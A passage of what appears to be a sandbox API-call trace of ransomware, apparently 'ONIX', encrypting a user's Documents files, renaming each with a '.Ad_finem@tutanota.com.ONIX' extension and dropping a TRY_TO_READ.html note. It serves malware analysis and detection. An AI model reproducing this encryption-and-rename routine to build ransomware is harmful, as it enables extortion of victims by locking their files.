lpDistanceToMoveHigh=0x0) returned 0x0 [0120.886] ReadFile (in: hFile=0x4a8, lpBuffer=0xf50048, nNumberOfBytesToRead=0x16686, lpNumberOfBytesRead=0x367f44c, lpOverlapped=0x0 | out: lpBuffer=0xf50048*, lpNumberOfBytesRead=0x367f44c*=0x16686, lpOverlapped=0x0) returned 1 [0120.890] UnlockFile (hFile=0x4a8, dwFileOffsetLow=0x0, dwFileOffsetHigh=0x0, nNumberOfBytesToUnlockLow=0x16686, nNumberOfBytesToUnlockHigh=0x0) returned 1 [0120.891] CloseHandle (hObject=0x4a8) returned 1 [0120.891] GetProcessHeap () returned 0x410000 [0120.891] HeapFree (in: hHeap=0x410000, dwFlags=0x0, lpMem=0x4d8c88 | out: hHeap=0x410000) returned 1 [0120.892] MoveFileExW (lpExistingFileName="C:\\\\Users\\5p5NrGJn0jS HALPmcxz\\Documents\\NYkJc74qVWOfQHxvUyJW.pptx" (normalized: "c:\\users\\5p5nrgjn0js halpmcxz\\documents\\nykjc74qvwofqhxvuyjw.pptx"), lpNewFileName="C:\\\\Users\\5p5NrGJn0jS HALPmcxz\\Documents\\NYkJc74qVWOfQHxvUyJW.pptx.12781717671972521061.Ad_finem@tutanota.com.ONIX" (normalized: "c:\\users\\5p5nrgjn0js halpmcxz\\documents\\nykjc74qvwofqhxvuyjw.pptx.12781717671972521061.ad_finem@tutanota.com.onix"), dwFlags=0x8) returned 1 [0120.896] GetProcessHeap () returned 0x410000 [0120.896] HeapFree (in: hHeap=0x410000, dwFlags=0x0, lpMem=0x43a4a0 | out: hHeap=0x410000) returned 1 [0120.896] FindNextFileW (in: hFindFile=0x48edf0, lpFindFileData=0x367f600 | out: lpFindFileData=0x367f600*(dwFileAttributes=0x20, ftCreationTime.dwLowDateTime=0x3672bd90, ftCreationTime.dwHighDateTime=0x1d5dab6, ftLastAccessTime.dwLowDateTime=0x2c808a10, ftLastAccessTime.dwHighDateTime=0x1d5b7b6, ftLastWriteTime.dwLowDateTime=0x2c808a10, ftLastWriteTime.dwHighDateTime=0x1d5b7b6, nFileSizeHigh=0x0, nFileSizeLow=0x11bda, dwReserved0=0xa0000003, dwReserved1=0x0, cFileName="o-GHBCo_KSaO.docx", cAlternateFileName="O-GHBC~1.DOC")) returned 1 [0120.896] CreateFileW (lpFileName="C:\\\\Users\\5p5NrGJn0jS HALPmcxz\\Documents\\o-GHBCo_KSaO.docx" (normalized: "c:\\users\\5p5nrgjn0js halpmcxz\\documents\\o-ghbco_ksao.docx"), dwDesiredAccess=0xc0010000, dwShareMode=0x0, lpSecurityAttributes=0x0, dwCreationDisposition=0x3, dwFlagsAndAttributes=0x88000000, hTemplateFile=0x0) returned 0x4a8 [0120.896] VirtualAlloc (lpAddress=0x0, dwSize=0x21c, flAllocationType=0x3000, flProtect=0x4) returned 0x2a0000 [0120.896] LockFile (hFile=0x4a8, dwFileOffsetLow=0x0, dwFileOffsetHigh=0x0, nNumberOfBytesToLockLow=0x11bda, nNumberOfBytesToLockHigh=0x0) returned 1 [0120.896] SetFilePointerEx (in: hFile=0x4a8, liDistanceToMove=0xfffffde4, lpNewFilePointer=0xffffffff, dwMoveMethod=0x0 | out: lpNewFilePointer=0xffffffff) returned 1 [0120.896] ReadFile (in: hFile=0x4a8, lpBuffer=0x2a0000, nNumberOfBytesToRead=0x21c, lpNumberOfBytesRead=0x367f44c, lpOverlapped=0x0 | out: lpBuffer=0x2a0000*, lpNumberOfBytesRead=0x367f44c*=0x21c, lpOverlapped=0x0) returned 1 [0120.897] SetFilePointerEx (in: hFile=0x4a8, liDistanceToMove=0x0, lpNewFilePointer=0x0, dwMoveMethod=0x0 | out: lpNewFilePointer=0x0) returned 1 [0120.897] VirtualFree (lpAddress=0x2a0000, dwSize=0x0, dwFreeType=0x8000) returned 1 [0120.897] CryptGenRandom (in: hProv=0x4581f8, dwLen=0x20, pbBuffer=0x4d8b80 | out: pbBuffer=0x4d8b80) returned 1 [0120.897] CryptGenRandom (in: hProv=0x4581f8, dwLen=0x8, pbBuffer=0x4b2780 | out: pbBuffer=0x4b2780) returned 1 [0120.897] SetFileAttributesW (lpFileName="C:\\\\Users\\5p5NrGJn0jS HALPmcxz\\Documents\\o-GHBCo_KSaO.docx", dwFileAttributes=0x80) returned 1 [0120.898] lstrlenW (lpString="C:\\\\Users\\5p5NrGJn0jS HALPmcxz\\Documents\\o-GHBCo_KSaO.docx") returned 58 [0120.898] GetProcessHeap () returned 0x410000 [0120.898] RtlAllocateHeap (HeapHandle=0x410000, Flags=0x0, Size=0xe4) returned 0x467908 [0120.898] lstrcpyW (in: lpString1=0x467908, lpString2="C:\\\\Users\\5p5NrGJn0jS HALPmcxz\\Documents\\o-GHBCo_KSaO.docx" | out: lpString1="C:\\\\Users\\5p5NrGJn0jS HALPmcxz\\Documents\\o-GHBCo_KSaO.docx") returned="C:\\\\Users\\5p5NrGJn0jS HALPmcxz\\Documents\\o-GHBCo_KSaO.docx" [0120.898] lstrcatW (in: lpString1="C:\\\\Users\\5p5NrGJn0jS HALPmcxz\\Documents\\o-GHBCo_KSaO.docx", lpString2=".12781717671972521061.Ad_finem@tutanota.com.ONIX" | out: lpString1="C:\\\\Users\\5p5NrGJn0jS HALPmcxz\\Documents\\o-GHBCo_KSaO.docx.12781717671972521061.Ad_finem@tutanota.com.ONIX") returned="C:\\\\Users\\5p5NrGJn0jS HALPmcxz\\Documents\\o-GHBCo_KSaO.docx.12781717671972521061.Ad_finem@tutanota.com.ONIX" [0120.898] GetFileSizeEx (in: hFile=0x4a8, lpFileSize=0x367f440 | out: lpFileSize=0x367f440*=72666) returned 1 [0120.898] SetFilePointer (in: hFile=0x4a8, lDistanceToMove=0, lpDistanceToMoveHigh=0x367f410*=0, dwMoveMethod=0x2 | out: lpDistanceToMoveHigh=0x367f410*=0) returned 0x11bda [0120.898] CryptEncrypt (in: hKey=0x447a68, hHash=0x0, Final=1, dwFlags=0x0, pbData=0x0*, pdwDataLen=0x367f42c*=0x20, dwBufLen=0x20 | out: pbData=0x0*, pdwDataLen=0x367f42c*=0x100) returned 1 [0120.898] GetProcessHeap () returned 0x410000 [0120.898] RtlAllocateHeap (HeapHandle=0x410000, Flags=0x8, Size=0x100) returned 0x4d8c88 [0120.898] CryptEncrypt (in: hKey=0x447a68, hHash=0x0, Final=1, dwFlags=0x0, pbData=0x4d8c88*, pdwDataLen=0x367f414*=0x20, dwBufLen=0x100 | out: pbData=0x4d8c88*, pdwDataLen=0x367f414*=0x100) returned 1 [0120.900] WriteFile (in: hFile=0x4a8, lpBuffer=0x4d8c88*, nNumberOfBytesToWrite=0x100, lpNumberOfBytesWritten=0x367f44c, lpOverlapped=0x0 | out: lpBuffer=0x4d8c88*, lpNumberOfBytesWritten=0x367f44c*=0x100, lpOverlapped=0x0) returned 1 [0120.901] WriteFile (in: hFile=0x4a8, lpBuffer=0x4b2780*, nNumberOfBytesToWrite=0x8, lpNumberOfBytesWritten=0x367f44c, lpOverlapped=0x0 | out: lpBuffer=0x4b2780*, lpNumberOfBytesWritten=0x367f44c*=0x8, lpOverlapped=0x0) returned 1 [0120.902] WriteFile (in: hFile=0x4a8, lpBuffer=0x4b2780*, nNumberOfBytesToWrite=0x4, lpNumberOfBytesWritten=0x367f44c, lpOverlapped=0x0 | out: lpBuffer=0x4b2780*, lpNumberOfBytesWritten=0x367f44c*=0x4, lpOverlapped=0x0) returned 1 [0120.903] RtlAllocateHeap (HeapHandle=0x410000, Flags=0x0, Size=0x11bda) returned 0xf50048 [0120.904] RtlAllocateHeap (HeapHandle=0x410000, Flags=0x0, Size=0x11bda) returned 0xf61c30 [0120.904] SetFilePointer (in: hFile=0x4a8, lDistanceToMove=0, lpDistanceToMoveHigh=0x0, dwMoveMethod=0x0 | out: lpDistanceToMoveHigh=0x0) returned 0x0 [0120.904] ReadFile (in: hFile=0x4a8, lpBuffer=0xf50048, nNumberOfBytesToRead=0x11bda, lpNumberOfBytesRead=0x367f44c, lpOverlapped=0x0 | out: lpBuffer=0xf50048*, lpNumberOfBytesRead=0x367f44c*=0x11bda, lpOverlapped=0x0) returned 1 [0120.907] UnlockFile (hFile=0x4a8, dwFileOffsetLow=0x0, dwFileOffsetHigh=0x0, nNumberOfBytesToUnlockLow=0x11bda, nNumberOfBytesToUnlockHigh=0x0) returned 1 [0120.908] CloseHandle (hObject=0x4a8) returned 1 [0120.909] GetProcessHeap () returned 0x410000 [0120.909] HeapFree (in: hHeap=0x410000, dwFlags=0x0, lpMem=0x4d8c88 | out: hHeap=0x410000) returned 1 [0120.909] MoveFileExW (lpExistingFileName="C:\\\\Users\\5p5NrGJn0jS HALPmcxz\\Documents\\o-GHBCo_KSaO.docx" (normalized: "c:\\users\\5p5nrgjn0js halpmcxz\\documents\\o-ghbco_ksao.docx"), lpNewFileName="C:\\\\Users\\5p5NrGJn0jS HALPmcxz\\Documents\\o-GHBCo_KSaO.docx.12781717671972521061.Ad_finem@tutanota.com.ONIX" (normalized: "c:\\users\\5p5nrgjn0js halpmcxz\\documents\\o-ghbco_ksao.docx.12781717671972521061.ad_finem@tutanota.com.onix"), dwFlags=0x8) returned 1 [0120.912] GetProcessHeap () returned 0x410000 [0120.912] HeapFree (in: hHeap=0x410000, dwFlags=0x0, lpMem=0x467908 | out: hHeap=0x410000) returned 1 [0120.912] FindNextFileW (in: hFindFile=0x48edf0, lpFindFileData=0x367f600 | out: lpFindFileData=0x367f600*(dwFileAttributes=0x10, ftCreationTime.dwLowDateTime=0x5a7a9f80, ftCreationTime.dwHighDateTime=0x1d2fad7, ftLastAccessTime.dwLowDateTime=0x8a4af3c0, ftLastAccessTime.dwHighDateTime=0x1d5e82a, ftLastWriteTime.dwLowDateTime=0x8a4af3c0, ftLastWriteTime.dwHighDateTime=0x1d5e82a, nFileSizeHigh=0x0, nFileSizeLow=0x0, dwReserved0=0xa0000003, dwReserved1=0x0, cFileName="Outlook Files", cAlternateFileName="OUTLOO~1")) returned 1 [0120.912] CreateFileW (lpFileName="C:\\\\Users\\5p5NrGJn0jS HALPmcxz\\Documents\\Outlook Files\\TRY_TO_READ.html" (normalized: "c:\\users\\5p5nrgjn0js halpmcxz\\documents\\outlook files\\try_to_read.html"), dwDesiredAccess=0x40000000, dwShareMode=0x0, lpSecurityAttributes=0x0, dwCreationDisposition=0x2, dwFlagsAndAttributes=0x80, hTemplateFile=0x0) returned 0x4a8 [0120.914] FindNextFileW (in: hFindFile=0x48edf0, lpFindFileData=0x367f600 | out: lpFindFileData=0x367f600*(dwFileAttributes=0x20, ftCreationTime.dwLowDateTime=0x4a492b0, ftCreationTime.dwHighDateTime=0x1d5e0e3, ftLastAccessTime.dwLowDateTime=0x5c9ba9a0, ftLastAccessTime.dwHighDateTime=0x1d5df2f, ftLastWriteTime.dwLowDateTime=0x5c9ba9a0, ftLastWriteTime.dwHighDateTime=0x1d5df2f, nFileSizeHigh=0x0, nFileSizeLow=0x4da0, dwReserved0=0xa0000003, dwReserved1=0x0, cFileName="PQWC-is.odt", cAlternateFileName="")) returned 1 [0120.914] CreateFileW (lpFileName="C:\\\\Users\\5p5NrGJn0jS HALPmcxz\\Documents\\PQWC-is.odt" (normalized: "c:\\users\\5p5nrgjn0js halpmcxz\\documents\\pqwc-is.odt"), dwDesiredAccess=0xc0010000, dwShareMode=0x0, lpSecurityAttributes=0x0, dwCreationDisposition=0x3, dwFlagsAndAttributes=0x88000000, hTemplateFile=0x0) returned 0x4a8 [0120.914] VirtualAlloc (lpAddress=0x0, dwSize=0x21c, flAllocationType=0x3000, flProtect=0x4) returned 0x2a0000 [0120.914] LockFile (hFile=0x4a8, dwFileOffsetLow=0x0, dwFileOffsetHigh=0x0, nNumberOfBytesToLockLow=0x4da0, nNumberOfBytesToLockHigh=0x0) returned 1 [0120.914] SetFilePointerEx (in: hFile=0x4a8, liDistanceToMove=0xfffffde4, lpNewFilePointer=0xffffffff, dwMoveMethod=0x0 | out: lpNewFilePointer=0xffffffff) returned 1 [0120.914] ReadFile (in: hFile=0x4a8, lpBuffer=0x2a0000, nNumberOfBytesToRead=0x21c, lpNumberOfBytesRead=0x367f44c, lpOverlapped=0x0 | out: lpBuffer=0x2a0000*, lpNumberOfBytesRead=0x367f44c*=0x21c, lpOverlapped=0x0) returned 1 [0120.915] SetFilePointerEx (in: hFile=0x4a8, liDistanceToMove=0x0, lpNewFilePointer=0x0, dwMoveMethod=0x0 | out: lpNewFilePointer=0x0) returned 1 [0120.915] VirtualFree (lpAddress=0x2a0000, dwSize=0x0, dwFreeType=0x8000) returned 1 [0120.915] CryptGenRandom (in: hProv=0x4581f8, dwLen=0x20, pbBuffer=0x4d8b80 | out: pbBuffer=0x4d8b80) returned 1 [0120.915] CryptGenRandom (in: hProv=0x4581f8, dwLen=0x8, pbBuffer=0x4b2780 | out: pbBuffer=0x4b2780) returned 1 [0120.915] SetFileAttributesW (lpFileName="C:\\\\Users\\5p5NrGJn0jS HALPmcxz\\Documents\\PQWC-is.odt", dwFileAttributes=0x80) returned 1 [0120.915] lstrlenW (lpString="C:\\\\Users\\5p5NrGJn0jS HALPmcxz\\Documents\\PQWC-is.odt") returned 52 [0120.915] GetProcessHeap () returned 0x410000 [0120.915] RtlAllocateHeap (HeapHandle=0x410000, Flags=0x0, Size=0xd8) returned 0x43a518 [0120.915] lstrcpyW (in: lpString1=0x43a518, lpString2="C:\\\\Users\\5p5NrGJn0jS HALPmcxz\\Documents\\PQWC-is.odt" | out: lpString1="C:\\\\Users\\5p5NrGJn0jS HALPmcxz\\Documents\\PQWC-is.odt") returned="C:\\\\Users\\5p5NrGJn0jS HALPmcxz\\Documents\\PQWC-is.odt" [0120.915] lstrcatW (in: lpString1="C:\\\\Users\\5p5NrGJn0jS HALPmcxz\\Documents\\PQWC-is.odt", lpString2=".12781717671972521061.Ad_finem@tutanota.com.ONIX" | out: lpString1="C:\\\\Users\\5p5NrGJn0jS HALPmcxz\\Documents\\PQWC-is.odt.12781717671972521061.Ad_finem@tutanota.com.ONIX") returned="C:\\\\Users\\5p5NrGJn0jS HALPmcxz\\Documents\\PQWC-is.odt.12781717671972521061.Ad_finem@tutanota.com.ONIX" [0120.915] GetFileSizeEx (in: hFile=0x4a8, lpFileSize=0x367f440 | out: lpFileSize=0x367f440*=19872) returned 1 [0120.915] SetFilePointer (in: hFile=0x4a8, lDistanceToMove=0, lpDistanceToMoveHigh=0x367f410*=0, dwMoveMethod=0x2 | out: lpDistanceToMoveHigh=0x367f410*=0) returned 0x4da0 [0120.915] CryptEncrypt (in: hKey=0x447a68, hHash=0x0, Final=1, dwFlags=0x0, pbData=0x0*, pdwDataLen=0x367f42c*=0x20, dwBufLen=0x20 | out: pbData=0x0*, pdwDataLen=0x367f42c*=0x100) returned 1 [0120.916] GetProcessHeap () returned 0x410000 [0120.916] RtlAllocateHeap (HeapHandle=0x410000, Flags=0x8, Size=0x100) returned 0x4d8c88 [0120.916] CryptEncrypt (in: hKey=0x447a68, hHash=0x0, Final=1, dwFlags=0x0, pbData=0x4d8c88*, pdwDataLen=0x367f414*=0x20, dwBufLen=0x100 | out: pbData=0x4d8c88*, pdwDataLen=0x367f414*=0x100) returned 1 [0120.917] WriteFile (in: hFile=0x4a8, lpBuffer=0x4d8c88*, nNumberOfBytesToWrite=0x100, lpNumberOfBytesWritten=0x367f44c, lpOverlapped=0x0 | out: lpBuffer=0x4d8c88*, lpNumberOfBytesWritten=0x367f44c*=0x100, lpOverlapped=0x0) returned 1 [0120.920] WriteFile (in: hFile=0x4a8, lpBuffer=0x4b2780*, nNumberOfBytesToWrite=0x8, lpNumberOfBytesWritten=0x367f44c, lpOverlapped=0x0 | out: lpBuffer=0x4b2780*, lpNumberOfBytesWritten=0x367f44c*=0x8, lpOverlapped=0x0) returned 1 [0120.921] WriteFile (in: hFile=0x4a8, lpBuffer=0x4b2780*, nNumberOfBytesToWrite=0x4, lpNumberOfBytesWritten=0x367f44c, lpOverlapped=0x0 | out: lpBuffer=0x4b2780*, lpNumberOfBytesWritten=0x367f44c*=0x4, lpOverlapped=0x0) returned 1 [0120.922] RtlAllocateHeap (HeapHandle=0x410000, Flags=0x0, Size=0x4da0) returned 0x4dab68 [0120.922] RtlAllocateHeap (HeapHandle=0x410000, Flags=0x0, Size=0x4da0) returned 0x4df910 [0120.922] SetFilePointer (in: hFile=0x4a8, lDistanceToMove=0, lpDistanceToMoveHigh=0x0, dwMoveMethod=0x0 | out: lpDistanceToMoveHigh=0x0) returned 0x0 [0120.922] ReadFile (in: hFile=0x4a8, lpBuffer=0x4dab68, nNumberOfBytesToRead=0x4da0, lpNumberOfBytesRead=0x367f44c, lpOverlapped=0x0 | out: lpBuffer=0x4dab68*, lpNumberOfBytesRead=0x367f44c*=0x4da0, lpOverlapped=0x0) returned 1 [0120.924] UnlockFile (hFile=0x4a8, dwFileOffsetLow=0x0, dwFileOffsetHigh=0x0, nNumberOfBytesToUnlockLow=0x4da0, nNumberOfBytesToUnlockHigh=0x0) returned 1 [0120.924] CloseHandle (hObject=0x4a8) returned 1 [0120.924] GetProcessHeap () returned 0x410000 [0120.924] HeapFree (in: hHeap=0x410000, dwFlags=0x0, lpMem=0x4d8c88 | out: hHeap=0x410000) returned 1 [0120.925] MoveFileExW (lpExistingFileName="C:\\\\Users\\5p5NrGJn0jS HALPmcxz\\Documents\\PQWC-is.odt" (normalized: "c:\\users\\5p5nrgjn0js halpmcxz\\documents\\pqwc-is.odt"), lpNewFileName="C:\\\\Users\\5p5NrGJn0jS HALPmcxz\\Documents\\PQWC-is.odt.12781717671972521061.Ad_finem@tutanota.com.ONIX" (normalized: "c:\\users\\5p5nrgjn0js halpmcxz\\documents\\pqwc-is.odt.12781717671972521061.ad_finem@tutanota.com.onix"), dwFlags=0x8) returned 1 [0120.927] GetProcessHeap () returned 0x410000 [0120.927] HeapFree (in: hHeap=0x410000, dwFlags=0x0, lpMem=0x43a518 | out: hHeap=0x410000) returned 1 [0120.927] FindNextFileW (in: hFindFile=0x48edf0, lpFindFileData=0x367f600 | out: lpFindFileData=0x367f600*(dwFileAttributes=0x20, ftCreationTime.dwLowDateTime=0xd40a6e40, ftCreationTime.dwHighDateTime=0x1d587c8, ftLastAccessTime.dwLowDateTime=0xc34d45f0, ftLastAccessTime.dwHighDateTime=0x1d57b02, ftLastWriteTime.dwLowDateTime=0xc34d45f0, ftLastWriteTime.dwHighDateTime=0x1d57b02, nFileSizeHigh=0x0, nFileSizeLow=0x18fd0, dwReserved0=0xa0000003, dwReserved1=0x0, cFileName="rXccnU5kZZT.docx", cAlternateFileName="RXCCNU~1.DOC")) returned 1 [0120.927] CreateFileW (lpFileName="C:\\\\Users\\5p5NrGJn0jS HALPmcxz\\Documents\\rXccnU5kZZT.docx" (normalized: "c:\\users\\5p5nrgjn0js halpmcxz\\documents\\rxccnu5kzzt.docx"), dwDesiredAccess=0xc0010000, dwShareMode=0x0, lpSecurityAttributes=0x0, dwCreationDisposition=0x3, dwFlagsAndAttributes=0x88000000, hTemplateFile=0x0) returned 0x4a8 [0120.927] VirtualAlloc (lpAddress=0x0, dwSize=0x21c, flAllocationType=0x3000, flProtect=0x4) returned 0x2a0000 [0120.927] LockFile (hFile=0x4a8, dwFileOffsetLow=0x0, dwFileOffsetHigh=0x0, nNumberOfBytesToLockLow=0x18fd0, nNumberOfBytesToLockHigh=0x0) returned 1 [0120.927] SetFilePointerEx (in: hFile=0x4a8, liDistanceToMove=0xfffffde4, lpNewFilePointer=0xffffffff, dwMoveMethod=0x0 | out: lpNewFilePointer=0xffffffff) returned 1 [0120.927] ReadFile (in: hFile=0x4a8, lpBuffer=0x2a0000, nNumberOfBytesToRead=0x21c, lpNumberOfBytesRead=0x367f44c, lpOverlapped=0x0 | out: lpBuffer=0x2a0000*, lpNumberOfBytesRead=0x367f44c*=0x21c, lpOverlapped=0x0) returned 1 [0120.928] SetFilePointerEx (in: hFile=0x4a8, liDistanceToMove=0x0, lpNewFilePointer=0x0, dwMoveMethod=0x0 | out: lpNewFilePointer=0x0) returned 1 [0120.928] VirtualFree (lpAddress=0x2a0000, dwSize=0x0, dwFreeType=0x8000) returned 1 [0120.928] CryptGenRandom (in: hProv=0x4581f8, dwLen=0x20, pbBuffer=0x4d8b80 | out: pbBuffer=0x4d8b80) returned 1 [0120.928] CryptGenRandom (in: hProv=0x4581f8, dwLen=0x8, pbBuffer=0x4b2780 | out: pbBuffer=0x4b2780) returned 1 [0120.928] SetFileAttributesW (lpFileName="C:\\\\Users\\5p5NrGJn0jS HALPmcxz\\Documents\\rXccnU5kZZT.docx", dwFileAttributes=0x80) returned 1 [0120.929] lstrlenW (lpString="C:\\\\Users\\5p5NrGJn0jS HALPmcxz\\Documents\\rXccnU5kZZT.docx") returned 57 [0120.929] GetProcessHeap () returned 0x410000 [0120.929] RtlAllocateHeap (HeapHandle=0x410000, Flags=0x0, Size=0xe2) returned 0x467908 [0120.929] lstrcpyW (in: lpString1=0x467908, lpString2="C:\\\\Users\\5p5NrGJn0jS HALPmcxz\\Documents\\rXccnU5kZZT.docx" | out: lpString1="C:\\\\Users\\5p5NrGJn0jS HALPmcxz\\Documents\\rXccnU5kZZT.docx") returned="C:\\\\Users\\5p5NrGJn0jS HALPmcxz\\Documents\\rXccnU5kZZT.docx" [0120.929] lstrcatW (in: lpString1="C:\\\\Users\\5p5NrGJn0jS HALPmcxz\\Documents\\rXccnU5kZZT.docx", lpString2=".12781717671972521061.Ad_finem@tutanota.com.ONIX" | out: lpString1="C:\\\\Users\\5p5NrGJn0jS HALPmcxz\\Documents\\rXccnU5kZZT.docx.12781717671972521061.Ad_finem@tutanota.com.ONIX") returned="C:\\\\Users\\5p5NrGJn0jS HALPmcxz\\Documents\\rXccnU5kZZT.docx.12781717671972521061.Ad_finem@tutanota.com.ONIX" [0120.929] GetFileSizeEx (in: hFile=0x4a8, lpFileSize=0x367f440 | out: lpFileSize=0x367f440*=102352) returned 1 [0120.929] SetFilePointer (in: hFile=0x4a8, lDistanceToMove=0, lpDistanceToMoveHigh=0x367f410*=0, dwMoveMethod=0x2 | out: lpDistanceToMoveHigh=0x367f410*=0) returned 0x18fd0 [0120.929] CryptEncrypt (in: hKey=0x447a68, hHash=0x0, Final=1, dwFlags=0x0, pbData=0x0*, pdwDataLen=0x367f42c*=0x20, dwBufLen=0x20 | out: pbData=0x0*, pdwDataLen=0x367f42c*=0x100) returned 1 [0120.929] GetProcessHeap () returned 0x410000 [0120.929] RtlAllocateHeap (HeapHandle=0x410000, Flags=0x8, Size=0x100) returned 0x4d8c88 [0120.929] CryptEncrypt (in: hKey=0x447a68, hHash=0x0, Final=1, dwFlags=0x0, pbData=0x4d8c88*, pdwDataLen=0x367f414*=0x20, dwBufLen=0x100 | out: pbData=0x4d8c88*, pdwDataLen=0x367f414*=0x100) returned 1 [0120.929] WriteFile (in: hFile=0x4a8, lpBuffer=0x4d8c88*, nNumberOfBytesToWrite=0x100, lpNumberOfBytesWritten=0x367f44c, lpOverlapped=0x0 | out: lpBuffer=0x4d8c88*, lpNumberOfBytesWritten=0x367f44c*=0x100, lpOverlapped=0x0) returned 1 [0120.931] WriteFile (in: hFile=0x4a8, lpBuffer=0x4b2780*, nNumberOfBytesToWrite=0x8, lpNumberOfBytesWritten=0x367f44c, lpOverlapped=0x0 | out: lpBuffer=0x4b2780*, lpNumberOfBytesWritten=0x367f44c*=0x8, lpOverlapped=0x0) returned 1 [0120.934] WriteFile (in: hFile=0x4a8, lpBuffer=0x4b2780*, nNumberOfBytesToWrite=0x4, lpNumberOfBytesWritten=0x367f44c, lpOverlapped=0x0 | out: lpBuffer=0x4b2780*, lpNumberOfBytesWritten=0x367f44c*=0x4, lpOverlapped=0x0) returned 1 [0120.935] RtlAllocateHeap (HeapHandle=0x410000, Flags=0x0, Size=0x18fd0) returned 0xf50048 [0120.936] RtlAllocateHeap (HeapHandle=0x410000, Flags=0x0, Size=0x18fd0) returned 0xf69020 [0120.936] SetFilePointer (in: hFile=0x4a8, lDistanceToMove=0, lpDistanceToMoveHigh=0x0, dwMoveMethod=0x0 | out: lpDistanceToMoveHigh=0x0) returned 0x0 [0120.936] ReadFile (in: hFile=0x4a8, lpBuffer=0xf50048, nNumberOfBytesToRead=0x18fd0, lpNumberOfBytesRead=0x367f44c, lpOverlapped=0x0 | out: lpBuffer=0xf50048*, lpNumberOfBytesRead=0x367f44c*=0x18fd0, lpOverlapped=0x0) returned 1 [0120.941] UnlockFile (hFile=0x4a8, dwFileOffsetLow=0x0, dwFileOffsetHigh=0x0, nNumberOfBytesToUnlockLow=0x18fd0, nNumberOfBytesToUnlockHigh=0x0) returned 1 [0120.941] CloseHandle (hObject=0x4a8) returned 1 [0120.943] GetProcessHeap () returned 0x410000 [0120.943] HeapFree (in: hHeap=0x410000, dwFlags=0x0, lpMem=0x4d8c88 | out: hHeap=0x410000) returned 1 [0120.943] MoveFileExW (lpExistingFileName="C:\\\\Users\\5p5NrGJn0jS HALPmcxz\\Documents\\rXccnU5kZZT.docx" (normalized: "c:\\users\\5p5nrgjn0js halpmcxz\\documents\\rxccnu5kzzt.docx"), lpNewFileName="C:\\\\Users\\5p5NrGJn0jS HALPmcxz\\Documents\\rXccnU5kZZT.docx.12781717671972521061.Ad_finem@tutanota.com.ONIX" (normalized: "c:\\users\\5p5nrgjn0js halpmcxz\\documents\\rxccnu5kzzt.docx.12781717671972521061.ad_finem@tutanota.com.onix"), dwFlags=0x8) returned 1 [0120.945] GetProcessHeap () returned 0x410000 [0120.945] HeapFree (in: hHeap=0x410000, dwFlags=0x0, lpMem=0x467908 | out: hHeap=0x410000) returned 1 [0120.945] FindNextFileW (in: hFindFile=0x48edf0, lpFindFileData=0x367f600 | out: lpFindFileData=0x367f600*(dwFileAttributes=0x20, ftCreationTime.dwLowDateTime=0x32860770, ftCreationTime.dwHighDateTime=0x1d5f247, ftLastAccessTime.dwLowDateTime=0x32860770, ftLastAccessTime.dwHighDateTime=0x1d5f247, ftLastWriteTime.dwLowDateTime=0x328868d0, ftLastWriteTime.dwHighDateTime=0x1d5f247, nFileSizeHigh=0x0, nFileSizeLow=0x14c4, dwReserved0=0xa0000003, dwReserved1=0x0, cFileName="TRY_TO_READ.html", cAlternateFileName="TRY_TO~1.HTM")) returned 1 [0120.945] FindNextFileW (in: hFindFile=0x48edf0, lpFindFileData=0x367f600 | out: lpFindFileData=0x367f600*(dwFileAttributes=0x20, ftCreationTime.dwLowDateTime=0x69bc47b0, ftCreationTime.dwHighDateTime=0x1d5c6fd, ftLastAccessTime.dwLowDateTime=0x4c5cc6e0, ftLastAccessTime.dwHighDateTime=0x1d56ef1, ftLastWriteTime.dwLowDateTime=0x4c5cc6e0, ftLastWriteTime.dwHighDateTime=0x1d56ef1, nFileSizeHigh=0x0, nFileSizeLow=0x1877f, dwReserved0=0xa0000003, dwReserved1=0x0, cFileName="tscZOceclriGcO7zOHOF.pptx", cAlternateFileName="TSCZOC~1.PPT")) returned 1 [0120.945] CreateFileW (lpFileName="C:\\\\Users\\5p5NrGJn0jS HALPmcxz\\Documents\\tscZOceclriGcO7zOHOF.pptx" (normalized: "c:\\users\\5p5nrgjn0js halpmcxz\\documents\\tsczoceclrigco7zohof.pptx"), dwDesiredAccess=0xc0010000, dwShareMode=0x0, lpSecurityAttributes=0x0, dwCreationDisposition=0x3, dwFlagsAndAttributes=0x88000000, hTemplateFile=0x0) returned 0x4a8 [0120.945] VirtualAlloc (lpAddress=0x0, dwSize=0x21c, flAllocationType=0x3000, flProtect=0x4) returned 0x2a0000 [0120.945] LockFile (hFile=0x4a8, dwFileOffsetLow=0x0, dwFileOffsetHigh=0x0, nNumberOfBytesToLockLow=0x1877f, nNumberOfBytesToLockHigh=0x0) returned 1 [0120.946] SetFilePointerEx (in: hFile=0x4a8, liDistanceToMove=0xfffffde4, lpNewFilePointer=0xffffffff, dwMoveMethod=0x0 | out: lpNewFilePointer=0xffffffff) returned 1 [0120.946] ReadFile (in: hFile=0x4a8, lpBuffer=0x2a0000, nNumberOfBytesToRead=0x21c, lpNumberOfBytesRead=0x367f44c, lpOverlapped=0x0 | out: lpBuffer=0x2a0000*, lpNumberOfBytesRead=0x367f44c*=0x21c, lpOverlapped=0x0) returned 1 [0120.946] SetFilePointerEx (in: hFile=0x4a8, liDistanceToMove=0x0, lpNewFilePointer=0x0, dwMoveMethod=0x0 | out: lpNewFilePointer=0x0) returned 1 [0120.946] VirtualFree (lpAddress=0x2a0000, dwSize=0x0, dwFreeType=0x8000) returned 1 [0120.946] CryptGenRandom (in: hProv=0x4581f8, dwLen=0x20, pbBuffer=0x4d8b80 | out: pbBuffer=0x4d8b80) returned 1 [0120.946] CryptGenRandom (in: hProv=0x4581f8, dwLen=0x8, pbBuffer=0x4b2780 | out: pbBuffer=0x4b2780) returned 1 [0120.947] SetFileAttributesW (lpFileName="C:\\\\Users\\5p5NrGJn0jS HALPmcxz\\Documents\\tscZOceclriGcO7zOHOF.pptx", dwFileAttributes=0x80) returned 1 [0120.947] lstrlenW (lpString="C:\\\\Users\\5p5NrGJn0jS HALPmcxz\\Documents\\tscZOceclriGcO7zOHOF.pptx") returned 66 [0120.947] GetProcessHeap () returned 0x410000 [0120.947] RtlAllocateHeap (HeapHandle=0x410000, Flags=0x0, Size=0xf4) returned 0x44faf8 [0120.947] lstrcpyW (in: lpString1=0x44faf8, lpString2="C:\\\\Users\\5p5NrGJn0jS HALPmcxz\\Documents\\tscZOceclriGcO7zOHOF.pptx" | out: lpString1="C:\\\\Users\\5p5NrGJn0jS HALPmcxz\\Documents\\tscZOceclriGcO7zOHOF.pptx") returned="C:\\\\Users\\5p5NrGJn0jS 